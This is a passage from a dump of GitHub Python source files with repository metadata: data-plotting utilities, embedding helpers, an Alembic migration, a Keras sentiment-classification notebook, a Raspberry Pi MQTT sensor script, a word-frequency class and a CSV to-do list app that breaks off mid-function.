frame\n :param cols: for which columns to compute statistics, by default: identifed automatically\n :param skip_freq_cols: which columns to skip\n :return: pandas df with stats\n \"\"\"\n if cols is None:\n cols = list(df.head(1).select_dtypes(include=['object']).columns)\n if skip_freq_cols is None:\n skip_freq_cols = []\n if len(cols) == 0:\n return None\n display(describe_categorical(df, cols))\n for col in cols:\n if col not in skip_freq_cols:\n if show_title:\n display(HTML(f' {col}'))\n # else:\n # display(HTML(' '))\n display(describe_categorical_freq(df[col]))\n\n\ndef set_display_options():\n \"\"\"\n Set display options for numbers, table width, etc.\n :return: None\n \"\"\"\n 
pd.set_option('plotting.backend', 'plotly')\n pd.set_option('display.max_rows', 100)\n pd.set_option('display.max_columns', 50)\n pd.set_option('display.width', 2000)\n pd.set_option('display.max_colwidth', 150)\n pd.set_option('max_colwidth', 150)\n pd.set_option('display.precision', 2)\n pd.set_option('display.chop_threshold', 1e-6)\n # pd.set_option('expand_frame_repr', True)\n pd.set_option('display.float_format', lambda x: '%.3f' % x)\n warnings.simplefilter('ignore')\n pl.Config.set_tbl_rows(10)\n display(HTML(\"\"))\n\n\ndef get_last_commit_hash():\n try:\n import subprocess\n result = subprocess.check_output(['git', 'log', '-1', '--pretty=format:\"%H\"'])\n return result.decode('utf-8').replace('\"', '')[:8]\n except Exception as e:\n return None\n\n\ndef get_timestamp():\n from datetime import datetime\n return datetime.now().strftime(\"%Y%m%d%H%M%S\")\n\n\ndef get_submit_file_name(prefix='submission', tag=None):\n tag = '' if tag is None else f'-{tag}'\n commit_hash = '' if get_last_commit_hash() is None else f'-{get_last_commit_hash()}'\n timestamp = f'-{get_timestamp()}'\n return f'{prefix}{timestamp}{tag}{commit_hash}'\n\n\ndef get_best_metric(lgbm_ranker):\n try:\n metric_, best_score = list(lgbm_ranker.best_score_['valid'].items())[0]\n except (AttributeError, IndexError):\n try:\n metric_, best_score = list(lgbm_ranker.best_score_['train'].items())[0]\n except:\n metric_, best_score = 'NA', 'NA'\n\n return metric_, best_score\n\n\ndef get_best_iter(lgbm_ranker):\n best_iter = lgbm_ranker.best_iteration_ \\\n if lgbm_ranker.best_iteration_ is not None \\\n else lgbm_ranker.get_params().get('n_estimators')\n return best_iter\n\n\ndef plot_forecast_in_out(self):\n fig = go.Figure()\n t = self.forecaster.target_name\n fig.add_trace(\n go.Scatter(\n x=pd.to_datetime(np.concatenate([self.forecast_in['upgrade'], self.forecast_out['upgrade']])),\n y=np.concatenate([self.forecast_in[t], self.forecast_out[t]]),\n name=f\"actual {t}\", mode='lines', opacity=0.7,\n line=dict(color='black', width=2))\n )\n fig.add_trace(\n go.Scatter(\n x=self.forecast_in['upgrade'], y=self.forecast_in[f'pred_{t}'],\n name=f\"forecast in\", mode='lines', opacity=0.7, line=dict(color='green', width=2))\n )\n fig.add_trace(\n go.Scatter(\n x=self.forecast_out['upgrade'], y=self.forecast_out[f'pred_{t}'],\n name=f\"forecast out\", mode='lines', opacity=0.7, line=dict(color='red', width=2))\n )\n fig.update_layout(title=self.forecaster_class.__name__, autosize=True, height=750,\n legend=dict(x=0, y=1, bgcolor='rgba(0,0,0,0)'))\n py.iplot(fig)\n # py.plot(fig)\n\n\ndef plot_multiple_cfips(df, measure='microbusiness_density', title=None, max_n=30, height=config.HEIGHT_PLOT_MEDIUM):\n fig = go.Figure()\n\n if title is None:\n title = ', '.join(sorted(list(df['state'].unique())))\n\n for cfips in sorted(list(df['cfips'].unique()))[:max_n]:\n df_cfips = df.filter(pl.col('cfips') == cfips)\n fig.add_trace(\n go.Scatter(\n x=df_cfips['first_day_of_month'],\n y=df_cfips[measure],\n name=cfips,\n mode='lines',\n opacity=0.7\n )\n )\n fig.update_layout(\n title=f'{title} - {measure}',\n autosize=True,\n height=height,\n legend=dict(x=1, y=0, bgcolor='rgba(0,0,0,0)'),\n yaxis={'title': measure},\n margin=config.PLOT_MARGINS_MEDIUM,\n )\n py.iplot(fig)\n\n\ndef plot_multiple_cfips_microbiz_dens(df):\n return plot_multiple_cfips(df, measure='microbusiness_density')\n\n\ndef plot_multiple_cfips_active(df):\n return plot_multiple_cfips(df, measure='active')\n\n\ndef plot_multiple_cfips_population(df):\n return 
plot_multiple_cfips(df, measure='population')\n\n\ndef plot_aggregated_cfips(df, title=None, measure='microbusiness_density', by='first_day_of_month',\n                          lo_q=0.25, mid='mean', hi_q=0.75, include_hi_lo=True, height=config.HEIGHT_PLOT_LOW):\n\n    if title is None:\n        title = ', '.join(sorted(list(df['state'].unique())))\n\n    df_agg = df \\\n        .groupby(by) \\\n        .agg([pl.quantile(measure, hi_q).alias(f'q{hi_q * 100}'),\n              pl.median(measure).alias('median'),\n              pl.mean(measure).alias('mean'),\n              pl.sum(measure).alias('sum'),\n              pl.quantile(measure, lo_q).alias(f'q{lo_q * 100}'),\n              ]) \\\n        .sort(by)\n\n    fig = go.Figure()\n    fig.add_trace(\n        go.Scatter(\n            name=mid,\n            x=df_agg['first_day_of_month'],\n            y=df_agg[mid],\n            mode='lines',\n            line=dict(color='rgb(31, 119, 180)', width=3),\n            showlegend=False\n        )\n    )\n\n    if include_hi_lo:\n        fig.add_trace(\n            go.Scatter(\n                name=f'q{hi_q * 100}',\n                x=df_agg['first_day_of_month'],\n                y=df_agg[f'q{hi_q * 100}'],\n                mode='lines',\n                marker=dict(color=\"#444\"),\n                line=dict(width=0),\n                showlegend=False\n            )\n        )\n\n        fig.add_trace(\n            go.Scatter(\n                name=f'q{lo_q * 100}',\n                x=df_agg['first_day_of_month'],\n                y=df_agg[f'q{lo_q * 100}'],\n                marker=dict(color=\"#444\"),\n                line=dict(width=0),\n                mode='lines',\n                fillcolor='rgba(68, 68, 68, 0.3)',\n                fill='tonexty',\n                showlegend=False\n            )\n        )\n\n    fig.update_layout(\n        title=f'{title} - {measure}',\n        autosize=True,\n        height=height,\n        yaxis_title=measure,\n        hovermode=\"x\",\n        margin=config.PLOT_MARGINS_SMALL,\n    )\n    py.iplot(fig)\n\n\ndef plot_aggregated_cfips_microbiz_dens(df):\n    return plot_aggregated_cfips(df, measure='microbusiness_density')\n\n\ndef plot_aggregated_cfips_active(df):\n    return plot_aggregated_cfips(df, measure='active', mid='sum', include_hi_lo=False, height=config.HEIGHT_PLOT_MEDIUM)\n\n\ndef plot_aggregated_cfips_population(df):\n    return plot_aggregated_cfips(df, measure='population', mid='sum', include_hi_lo=False)\n\n\ndef make_plots_cfips(df_train, state):\n    if not config.MAKE_PLOTS:\n        return  # skip plotting when disabled in config\n\n    # plot_multiple_cfips_microbiz_dens(df_train.filter(pl.col('state') == state))\n    plot_multiple_cfips_active(df_train.filter(pl.col('state') == state))\n    # plot_multiple_cfips_population(df_train.filter(pl.col('state') == state))\n\n    # plot_aggregated_cfips_microbiz_dens(df_train.filter(pl.col('state') == state))\n    plot_aggregated_cfips_active(df_train.filter(pl.col('state') == state))\n    # plot_aggregated_cfips_population(df_train.filter(pl.col('state') == state))\n\n\ndef get_stats(values, by, sub_na_with=None):\n    if sub_na_with is not None:\n        by = np.array(by)\n        by[~(by == by)] = sub_na_with\n    d = pd.DataFrame({'values': np.array(values).astype('float'), 'by': np.array(by)})\n    d_agg = d.groupby('by', as_index=False).agg(\n        count=('values', len),\n        min=('values', np.nanmin),\n        p10=('values', lambda x: np.nanpercentile(x, 10)),\n        p25=('values', lambda x: np.nanpercentile(x, 25)),\n        p50=('values', lambda x: np.nanpercentile(x, 50)),\n        mean=('values', np.nanmean),\n        sd=('values', np.nanstd),\n        p75=('values', lambda x: np.nanpercentile(x, 75)),\n        p90=('values', lambda x: np.nanpercentile(x, 90)),\n        max=('values', np.nanmax)\n    )\n    return d_agg\n\n\ndef get_box_chart(x, y, name=None, return_stats=False, order_by_count=False, min_prc_count=None, sub_na_with=None, **kwargs):\n    d_agg = get_stats(y, x, sub_na_with)\n\n    if order_by_count:\n        d_agg = d_agg.sort_values(['count'], ascending=False)\n\n    if min_prc_count is not None:\n        d_agg = d_agg.loc[d_agg['count'] > (min_prc_count*sum(d_agg['count']))]\n\n    box = go.Box(\n        name=name,\n
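        # lowerfence/upperfence are fed p10/p90 from get_stats, so the whiskers\n        # span the 10th-90th percentile range rather than Tukey-style fences.\n        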
x=d_agg['by'],\n lowerfence=d_agg['p10'],\n q1=d_agg['p25'],\n median=d_agg['p50'],\n mean=d_agg['mean'],\n q3=d_agg['p75'],\n upperfence=d_agg['p90'],\n # boxpoints=False,\n # boxmean=True,\n **kwargs\n )\n if return_stats:\n return box, d_agg\n else:\n return box\n\n\ndef plot_box_plot(target_values, by_values, yaxis_title='value', xaxis_title='by', x_as_category=True,\n order_by_count=False, min_prc_count=None, sub_na_with=None):\n fig = go.Figure()\n trace_ = get_box_chart(x=by_values, y=target_values, name=xaxis_title,\n order_by_count=order_by_count, min_prc_count=min_prc_count, sub_na_with=sub_na_with)\n fig.add_trace(trace_)\n fig.update_layout(\n title='',\n autosize=True, legend=dict(x=0, y=1, bgcolor='rgba(0,0,0,0)'), height=config.HEIGHT_PLOT_MEDIUM, # width=1200,\n margin=dict(l=25, r=25, t=25, b=25), # yaxis_range=rng_y_boxplot, # boxmode='group',\n xaxis_title=xaxis_title,\n yaxis_title=yaxis_title,\n )\n if x_as_category:\n fig.update_xaxes(type='category')\n\n return fig\n","repo_name":"nicolaivicol/gd-mbiz-dens-fcst","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"33578568260","text":"from tqdm import tqdm\nimport numpy as np\n\n\ndef read_embeddings(fname, encoding='utf-8'):\n with open(fname, 'r', encoding=encoding) as src:\n header = src.readline()\n wordcount, vectorsize = map(int, header.split())\n word2index = {}\n vectors = np.zeros([wordcount, vectorsize])\n for i in tqdm(range(wordcount)):\n row = src.readline().split()\n if len(row) != vectorsize + 1:\n continue\n word = row[0]\n vector = np.array(list(map(float, row[1:])))\n word2index[word] = i\n vectors[i, :] = vector\n return word2index, vectors\n\n\ndef save_embeddings(fname, word2index, vectors, encoding='utf-8'):\n with open(fname, 'w', encoding=encoding) as target:\n target.write('{0} {1}\\n'.format(len(word2index), vectors.shape[1]))\n for word, index in tqdm(word2index.items(), total=len(word2index)):\n vector = vectors[index]\n vector_str = ' '.join(map(str, vector))\n target.write('{0} {1}\\n'.format(word, vector_str))\n\n\ndef cutten_embeddings(wordset, word2index, vectors):\n word2index_cut = {}\n for word in tqdm(sorted(wordset)):\n if word not in word2index:\n continue\n word2index_cut[word] = len(word2index_cut)\n vectors_cut = np.zeros([len(word2index_cut) + 1, vectors.shape[1]])\n for word, index in tqdm(word2index_cut.items()):\n vectors_cut[index, :] = vectors[word2index[word]]\n return word2index_cut, vectors_cut\n","repo_name":"QtRoS/nodl_toxic","sub_path":"toxic-neural/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"11926911587","text":"\"\"\"posts tag\n\nRevision ID: c8d93aa46fe8\nRevises: 7040ce8985c8\nCreate Date: 2020-03-18 19:11:48.214433\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c8d93aa46fe8'\ndown_revision = '7040ce8985c8'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_index(op.f('ix_softwares_dateRelease'), 'softwares', ['dateRelease'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_softwares_dateRelease'), table_name='softwares')\n # ### end Alembic commands ###\n","repo_name":"pbaesse/dados-livres","sub_path":"migrations/versions/c8d93aa46fe8_posts_tag.py","file_name":"c8d93aa46fe8_posts_tag.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"}
+{"seq_id":"71427538920","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\ntrain = pd.read_csv('../input/movie-review-sentiment-analysis-kernels-only/train.tsv', sep=\"\\t\")\ntest = pd.read_csv('../input/movie-review-sentiment-analysis-kernels-only/test.tsv', sep=\"\\t\")\nsub = pd.read_csv('../input/movie-review-sentiment-analysis-kernels-only/sampleSubmission.csv', sep=\",\")\nfull_text = list(train['Phrase'].values) + list(test['Phrase'].values)\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\n\nimport keras \nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.layers import Dense, Input, LSTM, Embedding, Dropout, Activation, Conv1D, GRU\nfrom keras.layers import Bidirectional, GlobalMaxPool1D, MaxPooling1D, Add, Flatten\nfrom keras.layers import GlobalAveragePooling1D, GlobalMaxPooling1D, concatenate, SpatialDropout1D, BatchNormalization\nfrom keras.models import Model, load_model\nfrom keras import initializers, regularizers, constraints, optimizers, layers, callbacks\nfrom keras import backend as K\nfrom keras.engine import InputSpec, Layer\nfrom keras.optimizers import Adam, RMSprop\n\nfrom keras.callbacks import Callback, EarlyStopping, ModelCheckpoint, LearningRateScheduler\ntokenizer = Tokenizer(lower = True, filters = '')\ntokenizer.fit_on_texts(full_text)\ntrain_tokenized = tokenizer.texts_to_sequences(train['Phrase'])\ntest_tokenized = tokenizer.texts_to_sequences(test['Phrase'])\nmax_len = 50\nX_train = pad_sequences(train_tokenized, maxlen = max_len)\nX_test = pad_sequences(test_tokenized, maxlen = max_len)\nX_train.shape\nX_test.shape\nembedding_path = \"../input/fasttext-crawl-300d-2m/crawl-300d-2M.vec\"\nembed_size = 300\nmax_features = 20000\ndef get_coefs(word,*arr):\n return word, np.asarray(arr, dtype='float32')\ndef get_embed_mat(embedding_path):\n \n embedding_index = dict(get_coefs(*o.strip().split(\" \")) for o in open(embedding_path))\n\n word_index = tokenizer.word_index\n nb_words = min(max_features, len(word_index))\n embedding_matrix = np.zeros((nb_words + 1, embed_size))\n for word, i in word_index.items():\n if i >= max_features:\n continue\n embedding_vector = embedding_index.get(word)\n if embedding_vector is not None:\n embedding_matrix[i] = embedding_vector\n \n return embedding_matrix\ny = train['Sentiment']\n\none_hot_encoder = OneHotEncoder(sparse=False)\ny_one_hot = one_hot_encoder.fit_transform(y.values.reshape(-1, 1))\nfile_path = \"model.hdf5\"\ncheck_point = ModelCheckpoint(file_path, monitor = \"val_loss\", verbose = 1,\n save_best_only = True, mode = \"min\")\nearly_stop = EarlyStopping(monitor = \"val_loss\", mode = \"min\", patience = 10)\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.layers import Dense, Input, LSTM, Embedding, Dropout, Activation, Conv1D, GRU, CuDNNGRU, 
CuDNNLSTM, BatchNormalization\nfrom keras.layers import Bidirectional, GlobalMaxPool1D, MaxPooling1D, Add, Flatten\nfrom keras.layers import GlobalAveragePooling1D, GlobalMaxPooling1D, concatenate, SpatialDropout1D\nfrom keras.models import Model, load_model\nfrom keras import initializers, regularizers, constraints, optimizers, layers, callbacks\nfrom keras import backend as K\nfrom keras.engine import InputSpec, Layer\nfrom keras.optimizers import Adam\n\nfrom keras.callbacks import ModelCheckpoint, TensorBoard, Callback, EarlyStopping\ndef build_model(lr = 0.0, lr_d = 0.0, units = 0, dr = 0.0):\n    inp = Input(shape = (max_len,))\n    # input_dim must equal the number of rows in embedding_matrix for the pretrained weights to load\n    x = Embedding(embedding_matrix.shape[0], embed_size, weights = [embedding_matrix], trainable = False)(inp)\n    x1 = SpatialDropout1D(dr)(x)\n\n    x_gru = Bidirectional(CuDNNGRU(units, return_sequences = True))(x1)\n    x1 = Conv1D(32, kernel_size=3, padding='valid', kernel_initializer='he_uniform')(x_gru)\n    avg_pool1_gru = GlobalAveragePooling1D()(x1)\n    max_pool1_gru = GlobalMaxPooling1D()(x1)\n    \n    x3 = Conv1D(32, kernel_size=2, padding='valid', kernel_initializer='he_uniform')(x_gru)\n    avg_pool3_gru = GlobalAveragePooling1D()(x3)\n    max_pool3_gru = GlobalMaxPooling1D()(x3)\n    \n    x_lstm = Bidirectional(CuDNNLSTM(units, return_sequences = True))(x1)\n    x1 = Conv1D(32, kernel_size=3, padding='valid', kernel_initializer='he_uniform')(x_lstm)\n    avg_pool1_lstm = GlobalAveragePooling1D()(x1)\n    max_pool1_lstm = GlobalMaxPooling1D()(x1)\n    \n    x3 = Conv1D(32, kernel_size=2, padding='valid', kernel_initializer='he_uniform')(x_lstm)\n    avg_pool3_lstm = GlobalAveragePooling1D()(x3)\n    max_pool3_lstm = GlobalMaxPooling1D()(x3)\n    \n    \n    x = concatenate([avg_pool1_gru, max_pool1_gru, avg_pool3_gru, max_pool3_gru,\n                     avg_pool1_lstm, max_pool1_lstm, avg_pool3_lstm, max_pool3_lstm])\n    x = BatchNormalization()(x)\n    x = Dropout(0.1)(Dense(128,activation='relu') (x))\n    x = BatchNormalization()(x)\n    x = Dropout(0.1)(Dense(64,activation='relu') (x))\n    x = Dense(5, activation = \"sigmoid\")(x)\n    model = Model(inputs = inp, outputs = x)\n    model.compile(loss = \"binary_crossentropy\", optimizer = Adam(lr = lr, decay = lr_d), metrics = [\"accuracy\"])\n    history = model.fit(X_train, y_one_hot, batch_size = 128, epochs = 20, validation_split=0.1, \n                        verbose = 1, callbacks = [check_point, early_stop])\n    model = load_model(file_path)\n    return model\nembedding_matrix = get_embed_mat(embedding_path)\nmodel = build_model(lr = 1e-3, lr_d = 0, units = 128, dr = 0.5)\npred = model.predict(X_test, batch_size = 1024, verbose = 1)\npred\npredictions = np.round(np.argmax(pred, axis=1)).astype(int)\npredictions\nsub['Sentiment'] = predictions\nsub.to_csv(\"new_sub.csv\", index=False)\n","repo_name":"aorursy/new-nb-3","sub_path":"jayachandra1221_rnn-lstm.py","file_name":"jayachandra1221_rnn-lstm.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"6831066974","text":"#rasberry pi IO\nimport RPi.GPIO as GPIO\n#MCP3008 IO\nimport Adafruit_GPIO.SPI as SPI\nimport Adafruit_MCP3008\n#MCP3008 setting up\nSPI_PORT = 0\nSPI_DEVICE = 0\nmcp = Adafruit_MCP3008.MCP3008(spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE))\n\n\n#setup LED\nledGPIOnum = 26 #pin number on PI\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(ledGPIOnum,GPIO.OUT)\nLEDstate = 0\n#setup MCP print\nsoundChannelPin = 4\ngateChannelPin = 1\naudioChannelPin = 3\n#pin channels\n#gate = 1\n#light = 2\n#audio = 3\n#envelope = 4\n\n\n\n\nimport paho.mqtt.client as mqtt\nimport json as js\nimport time\n\n#import nearby devices\nimport proximity as prox\n\n\n#MQTT_SERVER = \"localhost\"\n#MQTT_SERVER = \"iot.eclipse.org\"\n#MQTT_SERVER = \"100.80.241.236\"\nMQTT_SERVER = \"192.168.137.110\"\nMQTT_PATH = \"broadcast\"\n\nsoundValue = 0\nregistry = {}\naddressList = []\nproxRegis = {}\ncurrent_3audioReadings = {}\n\ninfo = {'device_id':'B8:27:EB:DF:DO:DD','sensors':['Temperature', 'Audio', 'Gate', 'Envelope', 'Humidity', 'Light']}\n\n\n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n # Subscribing in on_connect() means that if we lose the connection and\n\n #-- Finds Broadcast and Sends Data to other devices on Broadcast --#\n #if (message_sent_State == False):\n client.subscribe(MQTT_PATH)\n #client.publish(MQTT_PATH, js.dumps(info, sort_keys=True))\n message_sent_State = True\n #client.publish(MQTT_PATH, \"HMM\")\n #print(js.dumps(info, sort_keys=True))\n\n #-- Listens for response --#\n client.subscribe(info['device_id'])\n client.subscribe(info['device_id']+'/sound')\ndef on_disconnect(client, userdata, msg):\n message_sent_State = False\n\n# Callback when message is recieved.\ndef on_message(client, userdata, msg):\n global registry,proxRegis\n print(msg.topic+\" \"+str(msg.payload))\n\n\n\n #parse and save\n #if (msg.topic != info['device_id']):\n try:\n input_data = js.loads(msg.payload)\n except:\n print(\"load failed\")\n\n print(input_data)\n registry[input_data['device_id']] = input_data['sensors']\n print(input_data['device_id'])\n #publish directly to new id\n client.publish(input_data['device_id'],js.dumps(info))\n addressList = prox.proximity()\n if input_data['device_id'] in addressList:\n proxRegis[input_data['device_id']] = True\n\n else:\n proxRegis[input_data['device_id']] = False\n print(\"List if nearby devices \\n\")\n print(js.dumps(proxRegis, indent=4))\n\n\ndef on_message_Sound(client, userdata, msg):\n global registry,proxRegis,current_3audioReadings,LEDstate\n listVal = {}\n print(\"sound callback\")\n try:\n input_data = js.loads(msg.payload)\n except:\n print(\"load failed\")\n #give data to request portion\n if 'device_id' in input_data:\n print(\"DEVICE ID\")\n #for sensor in input_data['sensors']:\n listVal['Envelope'] = soundValue\n client.publish(input_data['device_id']+'/sound', js.dumps(listVal))\n #take data and compare it to ourvalues\n else:\n print(\"Soundvalue on Callback\" + str(current_3audioReadings['Envelope']))\n if int(input_data['Envelope']) > int(current_3audioReadings['Envelope']):\n print(\"DATA\")\n if LEDstate == 1:\n GPIO.output(ledGPIOnum,GPIO.LOW)\n LEDstate = 0\n if LEDstate == 0:\n GPIO.output(ledGPIOnum,GPIO.HIGH)\n LEDstate = 1\n\n#this portion is just a on_message_Sound(Request portion of Code used to\n#Colaborate with Matt's Group)\ndef on_message_clap_detected(client,userdata,msg):\n 
    #callback function takes request from specific pi with device_id and\n    #gives back our sound data to clap_response+device_id\n\n    #Assumes they give the device_id\n    global current_3audioReadings,LEDstate\n    listVal = {}\n    print(\"clap_detected request callback\")\n    try:\n        input_data = js.loads(msg.payload)\n    except:\n        print(\"load failed\")\n        return\n    #iterate through values needed, find if a list of sensors exists\n    if 'sensors' in input_data:\n        for sensors in input_data['sensors']:\n            if sensors in current_3audioReadings:\n                listVal[sensors] = current_3audioReadings[sensors]\n    #if the sensor list wanted is empty assume they want at least one sound value\n    else:\n        listVal['Envelope'] = current_3audioReadings['Envelope'] #envelope value\n        listVal['Gate'] = current_3audioReadings['Gate'] #gate value\n        listVal['Audio'] = current_3audioReadings['Audio'] #audio value\n\n    client.publish('clap_response'+input_data['device_id'], js.dumps(listVal))\n\n\n\nclient = mqtt.Client()\n\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.on_disconnect = on_disconnect\nclient.message_callback_add(\"B8:27:EB:DF:D0:DD/sound\", on_message_Sound)\nclient.message_callback_add(\"clap_detected\", on_message_clap_detected)\n\nclient.connect(MQTT_SERVER, 1883, 60)\n\ntry:\n    client.publish(MQTT_PATH, js.dumps(info, sort_keys=True))\nexcept:\n    print(\"Did not publish\")\n\n\n# Blocking call that processes network traffic, dispatches callbacks and\n# handles reconnecting.\n# Other loop*() functions are available that give a threaded interface and a\n# manual interface.\n#client.loop_forever()\nsoundValue = 0\nLEDstate = 0\nprevsoundValue = 0\nclient.loop_start()\nwhile True:\n\n    soundValue = mcp.read_adc(soundChannelPin)#same as envelope\n    gateValue = mcp.read_adc(gateChannelPin)\n    audioValue = mcp.read_adc(audioChannelPin)\n    if gateValue >= 600:\n        time.sleep(.2)\n        print(\"made it\")\n    current_3audioReadings['Gate'] = gateValue\n    current_3audioReadings['Audio'] = audioValue\n    current_3audioReadings['Envelope'] = soundValue #envelope value\n\n    current_soundValue = soundValue\n\n    if LEDstate == 1:\n        GPIO.output(ledGPIOnum,GPIO.LOW)\n        LEDstate = 0\n    elif LEDstate == 0:  # elif keeps the LED toggling instead of always ending high\n        GPIO.output(ledGPIOnum,GPIO.HIGH)\n        LEDstate = 1\n\n    #send to all connected devices\n    wanted_info = {'device_id':'B8:27:EB:DF:D0:DD','sensors':['Gate','Envelope','Audio']}\n    if proxRegis:\n        for pi in proxRegis:\n            #print(\"this is the pi:\" + pi)\n            if ('Envelope' in registry[pi]) and (proxRegis[pi] == True):\n                #print(\"This is the registry:\" + str(registry[pi]))\n                client.publish(pi+'/sound', js.dumps(wanted_info))\n\n\n    time.sleep(0.2)\n\n#LED pin setup\n","repo_name":"bjalvara/mqtt","sub_path":"orchestration.py","file_name":"orchestration.py","file_ext":"py","file_size_in_byte":6517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"72456078119","text":"import pandas as pd\n\nclass Frecuencia:\n def __init__(self):\n self.data = pd.read_csv('../recursos/frequency_wikimedia', sep=\" \", header=None)\n self.data.columns = ['numero', 'palabra', 'frecuencia']\n self.data = self.data.drop(columns=['numero'])\n\n def obtener_frecuencia(self, palabra):\n token = palabra['token'].lower()\n if token in self.data['palabra'].tolist():\n elem = self.data.loc[self.data['palabra'] == token]['frecuencia']\n return elem.tolist()[0]\n else:\n return 0.0\n\n def obtener_mas_frecuente(self, lista_palabras):\n frecuencia_maxima = max([obtener_frecuencia(x) for x in lista_palabras])\n for palabra in lista_palabras:\n if self.obtener_frecuencia(palabra) == frecuencia_maxima:\n return palabra\n\n def ordenar_por_frecuencia(self, lista_palabras):\n return list(reversed(sorted(lista_palabras, key=self.obtener_frecuencia)))\n","repo_name":"joacolej/proygrado","sub_path":"src/recursos/lista_de_frecuencia.py","file_name":"lista_de_frecuencia.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"}
+{"seq_id":"31716504622","text":"import pprint #like var_dump\nimport sys\nimport os #files\nimport csv \n\n\nDATABASEFILE=\"database.csv\"\nCHECKBOX_COLUMN_NAME='Done'\nTODO_COLUMN_NAME='To do'\n\nclass bcolors:\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n Default = '\\033[99m'\n\n\ndef clear_console():\n \"\"\"Clearing console\"\"\"\n os.system('cls' if os.name=='nt' else 'clear')\n\n\ndef print_warning(warning, type='yellow'):\n \"\"\"Information print\"\"\"\n if type=='yellow':\n print(bcolors.WARNING+\"------------------------------\\n\"\n + warning\n +\" \\n------------------------------\"+bcolors.ENDC)\n \n if type=='red':\n print(bcolors.FAIL+\"------------------------------\\n\"\n + warning\n +\" \\n------------------------------\\n\"+bcolors.ENDC)\n if type=='green':\n print(bcolors.OKGREEN+\"------------------------------\\n\"\n + warning\n +\" \\n------------------------------\\n\"+bcolors.ENDC) \n\n\n\ndef add(item_to_add):\n \"\"\"Add item to list in file\"\"\"\n\n with open(DATABASEFILE, 'a' ) as csvfile:\n fieldnames = [CHECKBOX_COLUMN_NAME, TODO_COLUMN_NAME]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writerow({CHECKBOX_COLUMN_NAME: ' ', TODO_COLUMN_NAME: item_to_add})\n clear_console()\n print_warning(\"Item added.\", 'green') \n todo_list(write=True)\n \n\ndef save_to_file(data):\n \"\"\"Save data to file\"\"\"\n\n with open(DATABASEFILE, 'w') as csvfile:\n fieldnames = [CHECKBOX_COLUMN_NAME, TODO_COLUMN_NAME]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n \n for item in data:\n writer.writerow({CHECKBOX_COLUMN_NAME: item[1], TODO_COLUMN_NAME: item[2]})\n\n\ndef todo_list(write=0):\n \"\"\"List of todo\"\"\"\n \n with open(DATABASEFILE, newline='') as f:\n reader = csv.reader(f)\n list_todo = []\n if write is True:\n print(\"You saved the following to-do items: \\n \")\n i=0\n for row in reader:\n if i != 0:\n print(\" %3d.\" % (i) + \" [\" + str(row[0]) + \"] \" + str(row[1]))\n list_todo.append([i, row[0], row[1]])\n i+=1\n print()\n i=0 \n \n for row in reader:\n list_todo.append([i, row[0], row[1]])\n i+=1\n\n return list_todo \n\n\ndef mark_todo(mark=True):\n \"\"\"marking items\"\"\" \n \n td_list=todo_list(True) #write todo list\n while True:\n try: \n if (mark==False):\n mark_number=input('Which one you want to unmark (or Press Enter to leave): ')\n if mark_number=='x' or mark_number=='':\n clear_console()\n todo_list(write=True)\n break\n td_list[int(mark_number)][1]=str(' ')\n clear_console()\n print_warning(\"Item unmarked.\") \n else:\n mark_number=input('Which one you want to mark as completed (or Press Enter to leave): ')\n if mark_number=='x' or mark_number=='':\n clear_console()\n todo_list(write=True)\n break\n td_list[int(mark_number)][1]='x' \n clear_console()\n print_warning(\"Item marked.\") \n save_to_file(td_list) \n todo_list(write=True)\n\n except ValueError:\n \n clear_console()\n print_warning(\"It is not a number.\",'red') \n mark_todo()\n except IndexError:\n clear_console()\n print_warning(\"There is no item with this ID\",'red') \n mark_todo()\n\n \n \ndef archive():\n \"\"\"delete marked items from list\"\"\"\n\n to_do_list=todo_list(0)\n newtodolist=[]\n for item in to_do_list:\n if item[1] != 'x':\n newtodolist.append([' ', item[1], item[2]]) \n \n save_to_file(newtodolist)\n print_warning(\"Deleted marked items\", 'red')\n todo_list(write=True)\n\n\ndef checkdatabase():\n \"\"\"checking database file, if !exist than create it\"\"\" \n\n if not 
